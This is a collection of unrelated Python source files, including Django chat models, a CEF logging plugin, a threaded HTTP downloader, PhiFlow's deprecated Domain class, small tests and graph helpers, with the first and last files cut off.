        # raw_length counts visible characters only (no ANSI escape codes).
        raw_length=sum([len(bit) for bit in bits]),
    )
|
from django.db import models
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
from django.utils import timezone
# Create your models here.
class Message(models.Model):
    """A single chat message written by `author`."""
    author = models.ForeignKey(User, related_name='author_messages', on_delete=models.CASCADE)
    content = models.TextField()
    read = models.BooleanField(default=False)
    timestamp = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        return self.author.username
    def last_10_messages():
        # Bug fix: ordering ascending by 'timestamp' returned the OLDEST 10
        # messages; '-timestamp' returns the 10 most recent, newest first,
        # matching the function's name.
        return Message.objects.order_by('-timestamp').all()[:10]
class Contact(models.Model):
    """Friend list for a user; `friends` is a symmetric self-relation."""
    user = models.ForeignKey(User, related_name='friends',on_delete=models.CASCADE)
    friends = models.ManyToManyField('self', blank=True)
class ChatParticipants(models.Model):
    """Membership record grouping users into a chat group.

    NOTE(review): `participants` is a ForeignKey to a single User despite the
    plural name — confirm whether a ManyToManyField was intended.
    """
    participants = models.ForeignKey(User, related_name='group_members', on_delete=models.CASCADE)
    group_members = models.ManyToManyField('self', blank=True)
class Messages(models.Model):
    """A message posted into a ChatParticipants group."""
    contact = models.ForeignKey(ChatParticipants, related_name="messages", on_delete=models.CASCADE)
    content = models.TextField()
    timestamp = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        # Bug fix: ChatParticipants has no `user` attribute (its User FK is
        # named `participants`), so `self.contact.user` raised AttributeError.
        return self.contact.participants.username
class Chat(models.Model):
    """A conversation between users, created by `initiator` toward `receiver`."""
    chat_id = models.CharField(max_length=20, unique=True)
    participants = models.ManyToManyField(User, related_name='chat', blank=True)
    # Users who have removed this chat from their own view.
    deleted = models.ManyToManyField(User, related_name='deleted_by', blank=True)
    messages = models.ManyToManyField(Message, blank=True)
    date_updated = models.DateTimeField(default=timezone.now)
    # Whether the receiver has accepted the chat request.
    accept = models.BooleanField(default=False)
    initiator = models.ForeignKey(User, on_delete=models.CASCADE, related_name='init')
    receiver = models.ForeignKey(User, on_delete=models.CASCADE, related_name='receiver', blank=True, null=True)
    def __str__(self):
        return "{}".format(self.pk)
class ReportChat(models.Model):
    """A user's report (complaint) about a chat, with free-form `content`."""
    chat = models.ForeignKey(Chat, related_name='report_chat', on_delete=models.CASCADE)
    user = models.ForeignKey(User, related_name='user', on_delete=models.CASCADE)
    content = models.TextField()
    def __str__(self):
        return "{} - {}".format(self.chat, self.user)
|
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# The Initial Developer of the Original Code is the Mozilla Foundation.
# Portions created by the Initial Developer are Copyright (C) 2012
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Victor Ng (vng@mozilla.com)
#
# ***** END LICENSE BLOCK *****
METLOG_METHOD_NAME = 'cef'

# Recognized syslog facility / priority / option tokens for the CEF plugin.
VALID_FACILITY = ['KERN', 'USER', 'MAIL', 'DAEMON', 'AUTH', 'LPR',
        'NEWS', 'UUCP', 'CRON', 'LOCAL0', 'LOCAL1', 'LOCAL2', 'LOCAL3',
        'LOCAL4', 'LOCAL5', 'LOCAL6', 'LOCAL7', ]
VALID_PRIORITY = ['EMERG', 'ALERT', 'CRIT', 'ERR', 'WARNING',
        'NOTICE', 'INFO', 'DEBUG']
VALID_OPTIONS = ['PID', 'CONS', 'NDELAY', 'NOWAIT', 'LOG_PERROR']


class InvalidArgumentError(RuntimeError):
    """Raised when a CEF plugin configuration value is not recognized."""
    pass


def check_config(syslog_options, syslog_facility, syslog_ident,
                 syslog_priority):
    """Validate CEF/syslog plugin settings.

    Each argument may be None/empty (skipped); otherwise it must match the
    corresponding VALID_* list. Raises InvalidArgumentError on any bad value.
    """
    if syslog_options:
        # `basestring` keeps this Python-2 compatible like the rest of the
        # module (accepts both str and unicode option strings).
        if not isinstance(syslog_options, basestring):
            msg = "Option should be one of: %s" % str(VALID_OPTIONS)
            raise InvalidArgumentError(msg)
        # Options are a comma-separated list; every token must be known.
        # (Merged the previously duplicated `if syslog_options:` check.)
        for opt in syslog_options.split(','):
            if opt not in VALID_OPTIONS:
                msg = "Option should be one of: %s" % str(VALID_OPTIONS)
                raise InvalidArgumentError(msg)
    if syslog_facility:
        if syslog_facility not in VALID_FACILITY:
            msg = "Facility should be one of: %s" % str(VALID_FACILITY)
            raise InvalidArgumentError(msg)
    if syslog_ident:
        if not isinstance(syslog_ident, basestring):
            msg = "syslog_ident should be a string"
            raise InvalidArgumentError(msg)
    if syslog_priority:
        if syslog_priority not in VALID_PRIORITY:
            msg = "Priority should be one of : %s" % str(VALID_PRIORITY)
            # Bug fix: previously raised a bare RuntimeError, inconsistent
            # with every other validation failure. InvalidArgumentError
            # subclasses RuntimeError, so existing callers still catch it.
            raise InvalidArgumentError(msg)
def config_plugin(config):
    """
    Build the `log_cef` metlog method from a CEF plugin config dict.

    Pops and validates the syslog_* keys; any key left over in `config`
    afterwards is an error. The validated values are captured by the
    returned closure as `cef_meta`.
    """
    syslog_options = config.pop('syslog_options', None)
    syslog_facility = config.pop('syslog_facility', None)
    syslog_ident = config.pop('syslog_ident', None)
    syslog_priority = config.pop('syslog_priority', None)
    check_config(syslog_options, syslog_facility, syslog_ident,
            syslog_priority)
    # Anything still in `config` was not recognized — fail loudly.
    if len(config) > 0:
        msg = "Unexpected arguments: %s" % str(config.keys())
        raise InvalidArgumentError(msg)
    # Captured by the closure and shipped with every CEF message.
    cef_meta = {}
    cef_meta['syslog_options'] = syslog_options
    cef_meta['syslog_facility'] = syslog_facility
    cef_meta['syslog_ident'] = syslog_ident
    cef_meta['syslog_priority'] = syslog_priority
    def log_cef(self, name, severity, environ, config, username='none',
                signature=None, **kw):
        """Creates a CEF record, and emit it to metlog in the fields blob.
        Args:
            - name: name to log
            - severity: integer from 0 to 10
            - environ: the WSGI environ object
            - config: configuration dict
            - signature: CEF signature code - defaults to name value
            - username: user name - defaults to 'none'
            - extra keywords: extra keys used in the CEF extension
        """
        # Imported lazily so the cef package is only required when logging.
        from cef import _get_fields, _format_msg, _filter_params
        config = _filter_params('cef', config)
        fields = _get_fields(name, severity, environ, config,
                             username=username, signature=signature, **kw)
        msg = _format_msg(fields, kw)
        self.metlog(type='cef', payload=msg, fields={'cef_meta': cef_meta})
        # Return the formatted message
        return msg
    # metlog uses this attribute to register the method under its name.
    log_cef.metlog_name = METLOG_METHOD_NAME
    log_cef.cef_meta = cef_meta
    return log_cef
|
"""
The example returns a JSON response whose content is the same as that in
../resources/personality-v3-expect2.txt
"""
from __future__ import print_function
import json
from os.path import join, dirname
from watson_developer_cloud import PersonalityInsightsV3
# Authenticate against a fixed API version; replace the placeholder
# credentials before running.
personality_insights = PersonalityInsightsV3(
    version='2016-10-20',
    ## url is optional, and defaults to the URL below. Use the correct URL for your region.
    # url='https://gateway.watsonplatform.net/personality-insights/api',
    username='YOUR SERVICE USERNAME',
    password='YOUR SERVICE PASSWORD')
## If service instance provides API key authentication
# personality_insights = PersonalityInsightsV3(
#     version='2016-10-20',
#     ## url is optional, and defaults to the URL below. Use the correct URL for your region.
#     url='https://gateway.watsonplatform.net/personality-insights/api',
#     iam_api_key='your_api_key')
# Send the bundled sample profile and pretty-print the JSON response,
# including raw scores and consumption preferences.
with open(join(dirname(__file__), '../resources/personality-v3.json')) as \
        profile_json:
    profile = personality_insights.profile(
        profile_json.read(), content_type='application/json',
        raw_scores=True, consumption_preferences=True)
print(json.dumps(profile, indent=2))
|
from flask import Blueprint, jsonify, request
root_api = Blueprint("root_api", __name__)
@root_api.route("/api/recent")
def get_recent_nodes():
    """Serve the most recent nodes; the graph lookup is currently stubbed out."""
    # nodes, references = recent_papers_and_references()  # TODO: re-enable
    payload = {"nodes": None, "references": None}
    return jsonify(payload)
|
def fantasy():
    """Prompt for an NFL season, week and player count, then print the top
    rushing, passing, receiving and kicking stat lines for that week.

    Prints "Invalid input" and returns when the season is outside 2009-2019
    or the week outside 1-17.
    """
    import nflgame
    x = int(input("What year?: "))
    y = int(input("What week?: "))
    z = int(input("How many players?: "))
    print()
    # Guard clause replaces four nested ifs each duplicating the same
    # "Invalid input" message; the accepted bounds are unchanged.
    if not (2009 <= x < 2020 and 0 < y <= 17):
        print("Invalid input")
        return
    games = nflgame.games(x, week=y)
    players = nflgame.combine_game_stats(games)
    for p in players.rushing().sort('rushing_yds').limit(z):
        msg = '{}: {} carries for {} yards and {} TDs'
        print(msg.format(p, p.rushing_att, p.rushing_yds, p.rushing_tds))
    print()
    for p in players.passing().sort('passing_yds').limit(z):
        msg = '{}: {} passes for {} yards and {} TDs'
        print(msg.format(p, p.passing_att, p.passing_yds, p.passing_tds))
    print()
    for p in players.receiving().sort('receiving_yds').limit(z):
        msg = '{}: {} receptions for {} yards and {} TDs'
        print(msg.format(p, p.receiving_rec, p.receiving_yds, p.receiving_tds))
    print()
    for p in players.kicking().sort('kicking_fgm').limit(z):
        msg = '{}: {} out of {} field goals made'
        print(msg.format(p, p.kicking_fgm, p.kicking_fga))
|
import pytest
import palindrome
# Successful test: the empty string is treated as NOT a palindrome here.
def test_empty():
    assert palindrome.palindrome("") == False, "Empty string failed"
# Successful test: a plain lowercase palindrome.
def test_racecar():
    assert palindrome.palindrome("racecar"), "racecar failed"
# Failed test: expected to fail — presumably the implementation compares
# case-sensitively, so "Anna" != "annA" reversed.
def test_Anna():
    assert palindrome.palindrome("Anna"), "Anna string failed"
# Failed test: expected to fail — presumably leading whitespace is not
# stripped before comparison.
def test_spaces():
    assert palindrome.palindrome(" racecar"), "Space + racecar failed"
|
# coding: utf-8
import requests
import threading
import os
import sys
import time
import datetime
lock = threading.Lock()
class downloader:
    """Multi-threaded HTTP range downloader.

    Splits the remote file into one inclusive byte range per thread, fetches
    each range with an HTTP `Range` request and writes it at its offset in a
    pre-sized local file.
    """

    def __init__(self):
        # Target URL is taken from the command line.
        self.url = sys.argv[1]
        # Number of worker threads.
        self.num = 8
        # Local file name is the last path segment of the URL.
        self.name = self.url.split('/')[-1]
        # HEAD request discovers the resource size without downloading it.
        r = requests.head(self.url)
        self.size = int(r.headers['Content-Length'])
        print('文件 %s 大小为 %s bytes' % (self.name, self.size))
        print('####################################')

    def get_range(self):
        """Split [0, size) into self.num inclusive (start, end) byte ranges."""
        ranges = []
        offset = int(self.size / self.num)
        for i in range(self.num):
            if i == self.num - 1:
                # Last thread takes everything up to the final byte index.
                # Bug fix: previously ended at self.size, one past the last
                # byte (valid indices are 0..size-1).
                ranges.append((i * offset, self.size - 1))
            else:
                # Bug fix: HTTP Range ends are inclusive, so each chunk must
                # stop one byte before the next chunk's start; previously
                # adjacent ranges overlapped by one byte.
                ranges.append((i * offset, (i + 1) * offset - 1))
        return ranges

    def download(self, start, end):
        """Fetch bytes [start, end] and write them at `start` in the file."""
        # Bug fix: the range unit must be the literal 'bytes' (RFC 7233);
        # many servers reject 'Bytes'.
        headers = {'Range': 'bytes=%s-%s' % (start, end), 'Accept-Encoding': '*'}
        res = requests.get(self.url, headers=headers, stream=True)
        # Serialize the seek+write pair so threads cannot interleave them;
        # try/finally guarantees the lock is released even if write fails.
        lock.acquire()
        try:
            self.fd.seek(start)
            self.fd.write(res.content)
        finally:
            lock.release()
        print('[%s -> %s] \tdownload success' % (start, end))

    def run(self):
        """Pre-size the output file, spawn one thread per range, wait for all."""
        self.fd = open(self.name, 'wb')
        self.fd.truncate(self.size)
        thread_list = []
        n = 0
        start_time = time.time()
        for start, end in self.get_range():
            print('Thread %d:\t start_pos[%s] -> end_pos[%s]' % (n, start, end))
            n += 1
            worker = threading.Thread(target=self.download, args=(start, end))
            worker.start()
            thread_list.append(worker)
        print('####################################')
        for t in thread_list:
            t.join()
        end_time = time.time()
        print('####################################')
        print('文件 %s 下载完成!\n耗时:%f 秒' % (self.name, end_time - start_time))
        self.fd.close()
if __name__=='__main__':
    # Build the downloader (reads the URL from argv and HEADs the resource).
    down = downloader()
    # Start the threaded download.
    down.run()
|
import warnings
from numbers import Number
from typing import Union
from phi import math, field
from phi.field import CenteredGrid, StaggeredGrid, PointCloud, Field, mask
from phi.geom import Box, GridCell, Sphere, union, assert_same_rank
from phi.geom import Geometry
from phiml.math import Tensor, channel, instance
from phiml.math.extrapolation import ZERO, ONE, PERIODIC, BOUNDARY
from phiml.math import spatial
from phiml.math.extrapolation import combine_sides
from .fluid import Obstacle # for compatibility
warnings.warn("""Domain (phi.physics._boundaries) is deprecated and will be removed in a future release.
Please create grids directly, replacing the domain with a dict, e.g.
domain = dict(x=64, y=128, bounds=Box(x=1, y=1))
grid = CenteredGrid(0, **domain)""", FutureWarning, stacklevel=2)
def _create_boundary_conditions(obj: Union[dict, tuple, list], spatial_dims: tuple) -> dict:
    """
    Construct mixed boundary conditions from a sequence of boundary conditions.
    Args:
        obj: single boundary-condition dict (keyed by field kind), a
            dimension->condition dict, or a sequence of per-dimension
            conditions, each optionally a (lower, upper) pair.
        spatial_dims: ordered names of the spatial dimensions.
    Returns:
        Mixed boundary conditions as `dict` keyed by field kind.
    Raises:
        ValueError: if `obj` is neither a dict nor a sequence.
    """
    if isinstance(obj, dict) and all(dim in obj for dim in spatial_dims):
        # Dimension -> condition mapping: turn it into a sequence aligned
        # with its own key order.
        spatial_dims = obj.keys()
        obj = tuple(obj.values())
    elif isinstance(obj, dict):
        # Already a field-kind -> extrapolation dict; use as-is.
        return obj
    if isinstance(obj, (tuple, list)):
        keys = obj[0].keys() if isinstance(obj[0], dict) else obj[0][0].keys()
        result = {}
        for key in keys:
            # Combine per-dimension (and optionally per-side) extrapolations
            # into one mixed extrapolation per field kind.
            dim_to_extrap = {dim: (extrap[0][key], extrap[1][key]) if isinstance(extrap, (tuple, list)) else extrap[key]
                             for dim, extrap in zip(spatial_dims, obj)}
            result[key] = combine_sides(**dim_to_extrap)
        return result
    else:
        raise ValueError(obj)
# Boundary-condition presets. Each maps a field kind ('scalar', 'vector',
# 'active', 'accessible') to the extrapolation applied at the domain border.
OPEN = {
    'scalar': ZERO,
    'vector': BOUNDARY,
    'active': ZERO,
    'accessible': ONE,
}
# Solid walls: vector values are forced to zero at the border and the
# border cells are marked inaccessible.
STICKY = {
    'scalar': BOUNDARY,
    'vector': ZERO,
    'active': ZERO,
    'accessible': ZERO,
}
# NOTE: this rebinding shadows the `PERIODIC` extrapolation imported above;
# the dict values still reference the original extrapolation object.
PERIODIC = {
    'scalar': PERIODIC,
    'vector': PERIODIC,
    'active': PERIODIC,
    'accessible': PERIODIC,
}
class Domain:
    def __init__(self, resolution: Union[math.Shape, tuple, list] = math.EMPTY_SHAPE, boundaries: Union[dict, tuple, list] = OPEN, bounds: Box = None, **resolution_):
        """
        The Domain specifies the grid resolution, physical size and boundary conditions of a simulation.
        It provides convenience methods for creating Grids fitting the domain, e.g. `grid()`, `vector_grid()` and `staggered_grid()`.
        Also see the `phi.physics` module documentation at https://tum-pbs.github.io/PhiFlow/Physics.html
        Args:
            resolution: grid dimensions as Shape or sequence of integers. Alternatively, dimensions can be specified directly as kwargs.
            boundaries: specifies the extrapolation modes of grids created from this Domain.
                Default materials include OPEN, CLOSED, PERIODIC.
                To specify boundary conditions per face of the domain, pass a sequence of boundaries or boundary pairs (lower, upper)., e.g. [CLOSED, (CLOSED, OPEN)].
                See https://tum-pbs.github.io/PhiFlow/Physics.html#boundary-conditions .
            bounds: physical size of the domain. If not provided, the size is equal to the resolution (unit cubes).
        """
        warnings.warn("Domain is deprecated and will be removed in a future release. Use a dict instead, e.g. CenteredGrid(values, extrapolation, **domain_dict)", DeprecationWarning, stacklevel=2)
        warnings.warn("Domain is deprecated and will be removed in a future release. Use a dict instead, e.g. CenteredGrid(values, extrapolation, **domain_dict)", FutureWarning, stacklevel=2)
        self.resolution: math.Shape = spatial(resolution) & spatial(**resolution_)
        assert self.resolution.rank > 0, "Cannot create Domain because no dimensions were specified."
        """ Grid dimensions as `Shape` object containing spatial dimensions only. """
        self.boundaries: dict = _create_boundary_conditions(boundaries, self.resolution.names)
        """ Outer boundary conditions. """
        self.bounds: Box = Box(math.const_vec(0, self.resolution), math.wrap(self.resolution, channel('vector'))) if bounds is None else bounds
        """ Physical dimensions of the domain. """

    def __repr__(self):
        return '(%s, size=%s)' % (self.resolution, self.bounds.size)

    @property
    def shape(self) -> math.Shape:
        """ Alias for `Domain.resolution` """
        return self.resolution

    @property
    def rank(self) -> int:
        """Number of spatial dimensions of the simulation; spatial rank. 1 = 1D, 2 = 2D, 3 = 3D, etc."""
        return self.resolution.rank

    @property
    def dx(self) -> math.Tensor:
        """Size of a single grid cell (physical size divided by resolution) as `Tensor`"""
        return self.bounds.size / self.resolution

    @property
    def cells(self) -> GridCell:
        """
        Returns the geometry of all cells as a `Box` object.
        The box will have spatial dimensions matching the resolution of the Domain, i.e. `domain.cells.shape == domain.resolution`.
        """
        return GridCell(self.resolution, self.bounds)

    def center_points(self) -> math.Tensor:
        """
        Returns a Tensor enumerating the physical center locations of all cells within the Domain.
        This is equivalent to calling `domain.cells.center`.
        The shape of the returned Tensor extends the domain resolution by one vector dimension.
        """
        return self.cells.center

    def grid(self,
             value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
             type: type = CenteredGrid,
             extrapolation: math.Extrapolation = 'scalar') -> Union[CenteredGrid, StaggeredGrid]:
        """
        Creates a grid matching the resolution and bounds of the domain.
        The grid is created from the given `value` which must be one of the following:
        * Number (int, float, complex or zero-dimensional tensor): all grid values will be equal to `value`. This has a near-zero memory footprint.
        * Field: the given value is resampled to the grid cells of this Domain.
        * Tensor with spatial dimensions matching the domain resolution: grid values will equal `value`.
        * Geometry: grid values are determined from the volume overlap between grid cells and geometry. Non-overlapping = 0, fully enclosed grid cell = 1.
        * function(location: Tensor) returning one of the above.
        Args:
            value: constant, Field, Tensor or function specifying the grid values
            type: type of Grid to create, must be either CenteredGrid or StaggeredGrid
            extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['scalar']
        Returns:
            Grid of specified type
        """
        # A string extrapolation is looked up in the domain's boundary presets.
        extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
        return type(value, resolution=self.resolution, bounds=self.bounds, extrapolation=extrapolation)

    def scalar_grid(self,
                    value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
                    extrapolation: Union[str, math.Extrapolation] = 'scalar') -> CenteredGrid:
        """
        Creates a scalar grid matching the resolution and bounds of the domain.
        The grid is created from the given `value` which must be one of the following:
        * Number (int, float, complex or zero-dimensional tensor): all grid values will be equal to `value`. This has a near-zero memory footprint.
        * Scalar `Field`: the given value is resampled to the grid cells of this Domain.
        * Tensor with spatial dimensions matching the domain resolution: grid values will equal `value`.
        * Geometry: grid values are determined from the volume overlap between grid cells and geometry. Non-overlapping = 0, fully enclosed grid cell = 1.
        * function(location: Tensor) returning one of the above.
        * Native tensor: the number and order of axes are matched with the resolution of the domain.
        Args:
            value: constant, Field, Tensor or function specifying the grid values
            extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['scalar']
        Returns:
            `CenteredGrid` with no channel dimensions
        """
        extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
        if isinstance(value, Field):
            assert_same_rank(value.spatial_rank, self.rank, f"Cannot resample {value.spatial_rank}D field to {self.rank}D domain.")
        elif isinstance(value, Tensor):
            assert value.shape.channel.rank == 0
        elif isinstance(value, (Number, Geometry)):
            pass
        elif callable(value):
            pass
        else:
            # Native tensor: try aligning its axes with the domain resolution;
            # fall back to plain wrapping if the shapes are incompatible.
            try:
                value = math.wrap(value, self.resolution)
            except math.IncompatibleShapes:
                pass
                value = math.wrap(value)
        result = CenteredGrid(value, resolution=self.resolution, bounds=self.bounds, extrapolation=extrapolation)
        assert result.shape.channel_rank == 0
        return result

    def vector_grid(self,
                    value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
                    type: type = CenteredGrid,
                    extrapolation: Union[math.Extrapolation, str] = 'vector') -> Union[CenteredGrid, StaggeredGrid]:
        """
        Creates a vector grid matching the resolution and bounds of the domain.
        The grid is created from the given `value` which must be one of the following:
        * Number (int, float, complex or zero-dimensional tensor): all grid values will be equal to `value`. This has a near-zero memory footprint.
        * Field: the given value is resampled to the grid cells of this Domain.
        * Tensor with spatial dimensions matching the domain resolution: grid values will equal `value`.
        * Geometry: grid values are determined from the volume overlap between grid cells and geometry. Non-overlapping = 0, fully enclosed grid cell = 1.
        * function(location: Tensor) returning one of the above.
        The returned grid will have a vector dimension with size equal to the rank of the domain.
        Args:
            value: constant, Field, Tensor or function specifying the grid values
            type: class of Grid to create, must be either CenteredGrid or StaggeredGrid
            extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['vector']
        Returns:
            Grid of specified type
        """
        extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
        result = type(value, resolution=self.resolution, bounds=self.bounds, extrapolation=extrapolation)
        if result.shape.channel_rank == 0:
            # Scalar input: broadcast to a vector with one component per dimension.
            result = result.with_values(math.expand(result.values, channel(vector=self.rank)))
        else:
            assert result.shape.get_size('vector') == self.rank
        return result

    def staggered_grid(self,
                       value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
                       extrapolation: Union[math.Extrapolation, str] = 'vector') -> StaggeredGrid:
        """
        Creates a staggered grid matching the resolution and bounds of the domain.
        This is equal to calling `vector_grid()` with `type=StaggeredGrid`.
        Args:
            value: constant, Field, Tensor or function specifying the grid values
            extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['vector']
        Returns:
            `StaggeredGrid`
        """
        return self.vector_grid(value, type=StaggeredGrid, extrapolation=extrapolation)

    def vector_potential(self,
                         value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
                         extrapolation: Union[str, math.Extrapolation] = 'scalar',
                         curl_type=CenteredGrid):
        """Create a scalar potential grid on a domain extended by half a cell
        on each side, suitable for taking a staggered curl (2D only)."""
        if self.rank == 2 and curl_type == StaggeredGrid:
            pot_bounds = Box(self.bounds.lower - 0.5 * self.dx, self.bounds.upper + 0.5 * self.dx)
            # Bug fix: arguments were previously swapped
            # (Domain(self.boundaries, self.resolution + 1, ...)), passing the
            # boundaries dict as the resolution. Domain.__init__ takes
            # (resolution, boundaries, bounds).
            alt_domain = Domain(self.resolution + 1, self.boundaries, bounds=pot_bounds)
            return alt_domain.scalar_grid(value, extrapolation=extrapolation)
        raise NotImplementedError()

    def accessible_mask(self, not_accessible: Union[tuple, list], type: type = CenteredGrid, extrapolation='accessible') -> Union[CenteredGrid, StaggeredGrid]:
        """
        Unifies domain and Obstacle or Geometry objects into a binary StaggeredGrid mask which can be used
        to enforce boundary conditions.
        Args:
            not_accessible: blocked region(s) of space specified by geometries
            type: class of Grid to create, must be either CenteredGrid or StaggeredGrid
            extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['accessible']
        Returns:
            Binary mask indicating valid fields w.r.t. the boundary conditions.
        """
        extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
        accessible_mask = self.scalar_grid(mask(~union(not_accessible)), extrapolation=extrapolation)
        if type is CenteredGrid:
            return accessible_mask
        elif type is StaggeredGrid:
            # Face value is accessible only if both adjacent cells are.
            return field.stagger(accessible_mask, math.minimum, extrapolation)
        else:
            raise ValueError('Unknown grid type: %s' % type)

    def points(self,
               points: Union[Tensor, Number, tuple, list],
               values: Union[Tensor, Number] = None,
               radius: Union[Tensor, float, int, None] = None,
               extrapolation: math.Extrapolation = math.extrapolation.ZERO,
               color: Union[str, Tensor, tuple, list, None] = None) -> PointCloud:
        """
        Create a `phi.field.PointCloud` from the given `points`.
        The created field has no channel dimensions and all points carry the value `1`.
        Args:
            points: point locations in physical units
            values: (optional) values of the particles, defaults to 1.
            radius: (optional) size of the particles
            extrapolation: (optional) extrapolation to use, defaults to extrapolation.ZERO
            color: (optional) color used when plotting the points
        Returns:
            `phi.field.PointCloud` object
        """
        extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
        if radius is None:
            # Default particle size: 0.5% of the mean domain extent.
            radius = math.mean(self.bounds.size) * 0.005
        # --- Parse points: tuple / list ---
        if isinstance(points, (tuple, list)):
            if len(points) == 0:  # no points
                points = math.zeros(instance(points=0), channel(vector=1))
            elif isinstance(points[0], Number):  # single point
                points = math.tensor([points], instance('points'), channel('vector'))
            else:
                points = math.tensor(points, instance('points'), channel('vector'))
        elements = Sphere(points, radius)
        if values is None:
            values = math.tensor(1.)
        return PointCloud(elements, values, extrapolation, add_overlapping=False, bounds=self.bounds, color=color)

    def distribute_points(self,
                          geometries: Union[tuple, list],
                          points_per_cell: int = 8,
                          color: str = None,
                          center: bool = False) -> PointCloud:
        """
        Transforms `Geometry` objects into a PointCloud.
        Args:
            geometries: Geometry objects marking the cells which should contain points
            points_per_cell: Number of points for each cell of `geometries`
            color (Optional): Color of PointCloud
            center: Set all points to the center of the grid cells.
        Returns:
            PointCloud representation of `geometries`.
        """
        geometries = mask(union(geometries)).at(self.grid())
        initial_points = _distribute_points(geometries.values, points_per_cell, center=center)
        return self.points(initial_points, color=color)
def _distribute_points(mask: math.Tensor, points_per_cell: int = 1, center: bool = False) -> math.Tensor:
    """
    Generates points (either uniformly distributed or at the cell centers) according to the given tensor mask.
    Args:
        mask: Tensor with nonzero values at the indices where particles should get generated.
        points_per_cell: Number of particles to generate at each marked index
        center: Set points to cell centers. If False, points will be distributed using a uniform
            distribution within each cell.
    Returns:
        A tensor containing the positions of the generated points.
    """
    cell_indices = math.to_float(math.nonzero(mask, list_dim=instance('points')))
    if center:
        # Every batch sits exactly at the cell centers.
        batches = [cell_indices + 0.5 for _ in range(points_per_cell)]
    else:
        # Each batch gets independent uniform jitter within its cell.
        batches = [cell_indices + math.random_uniform(cell_indices.shape)
                   for _ in range(points_per_cell)]
    return math.concat(batches, dim=instance('points'))
|
from django.shortcuts import render
from django.http import HttpResponse
from .tasks import send_email_task
# Create your views here.
def email_sender(request):
    # Fire-and-forget: queue the Celery email task, then confirm immediately.
    send_email_task()
    # 'Wysłane!' is Polish for 'Sent!'.
    return HttpResponse('Wysłane!')
|
class Profile:
    """A minimal person record demonstrating class attributes and methods."""

    # Class attribute shared by every instance.
    pi = 3.14

    def __init__(self, theName, myAge):
        self.name = theName
        self.age = myAge

    def growOlder(self):
        """Advance the profile's age by one year."""
        self.age = self.age + 1

    def greet(self, language):
        """Return a greeting in English, or a joke for any other language."""
        if language != "English":
            return "I don't speak freaky deaky dutch!"
        return "Greetings, %s" % self.name
# bad way: attaching attributes after a bare construction
#p = Profile()
#p.age = 22
# with a constructor the attributes are required up front
# p = Profile() # this now raises an error (missing arguments)
p = Profile('Jeremy', 25)
p.growOlder()
# Return values below are discarded; these lines only demonstrate the calls.
p.greet("Dutch")
p.pi
|
def new_node_id(node_name, node_counts):
    """Return a unique '<name>-<n>' id and advance the per-name counter."""
    count = node_counts[node_name]
    node_counts[node_name] = count + 1
    return node_name + '-' + str(count)
def add_node_instance(graph, node, node_counts, regions = None):
    """Add a fresh instance of `node` to `graph` and return its generated id.

    Args:
        graph: networkx-style graph with an `add_node` method.
        node: node template; its `node_name` seeds the generated id.
        node_counts: per-name counters used by `new_node_id`.
        regions: optional iterable of region tags; stored as a frozenset.
    """
    node_id = new_node_id(node.node_name, node_counts)
    # Idiom fix: compare against None with `is`, not `==`.
    region_list = frozenset() if regions is None else frozenset(regions)
    graph.add_node(node_id, data=node, pos=(0, 0), regions=region_list)
    return node_id
def add_edge(graph, edge, node_counts, start = None, end = None, regions = None):
    """Add `edge` to `graph`, creating endpoint node instances as needed.

    Existing node ids may be supplied via `start`/`end`; otherwise new
    instances of the edge's endpoints are created (tagged with `regions`).
    Returns the (start_id, end_id) pair actually used.
    """
    start_node = edge.start
    end_node = edge.end
    # Idiom fix: identity comparison with None (`is not None`), not `!=`.
    start_node_id = start if start is not None else add_node_instance(graph, start_node, node_counts, regions=regions)
    end_node_id = end if end is not None else add_node_instance(graph, end_node, node_counts, regions=regions)
    graph.add_edge(start_node_id, end_node_id, edge.edgeId, data=edge)
    return (start_node_id, end_node_id)
def add_path(graph, path, node_counts, start = None, end = None, loop = False, regions = None):
    """Add a chain of edges to `graph`, threading each edge's end into the
    next edge's start. Returns the list of node ids along the path.

    `start`/`end` reuse existing node ids for the endpoints; `loop=True`
    closes the path back onto its first node.
    """
    path_start_node = path[0].start
    path_end_node = path[-1].end
    path_start_id = start if start != None else add_node_instance(graph, path_start_node, node_counts, regions = regions)
    path_end_id = None
    if loop:
        path_end_id = path_start_id
    elif end != None:
        path_end_id = end
    else:
        path_end_id = add_node_instance(graph, path_end_node, node_counts, regions = regions)
    path_ids = [path_start_id]
    # All edges except the last: each new end node becomes the next start.
    # NOTE(review): `regions` is not forwarded here, so interior nodes get an
    # empty region set while the endpoints are tagged — confirm whether
    # intermediate nodes should also receive `regions`.
    for i in range(len(path) - 1):
        edge_id = path[i]
        (_, edge_end_id) = add_edge(graph, edge_id, node_counts, start = path_ids[-1])
        path_ids.append(edge_end_id)
    # Final edge connects to the (possibly pre-existing or looped) end node.
    add_edge(graph, path[-1], node_counts, start = path_ids[-1], end = path_end_id, regions = regions)
    path_ids.append(path_end_id)
    return path_ids
|
from errors.CooldownError import CooldownError
from errors.ExecutionError import ExecutionError
from errors.PermissionError import PermissionError
class Command:
    """A chat-bot command: delegates permission and cooldown state to `parent`
    (the hosting bot API) and runs the command function via `execute`."""

    def __init__(self,
                 parent,
                 script_name,
                 command_key,
                 permission,
                 permission_specific,
                 global_cooldown,
                 user_cooldown,
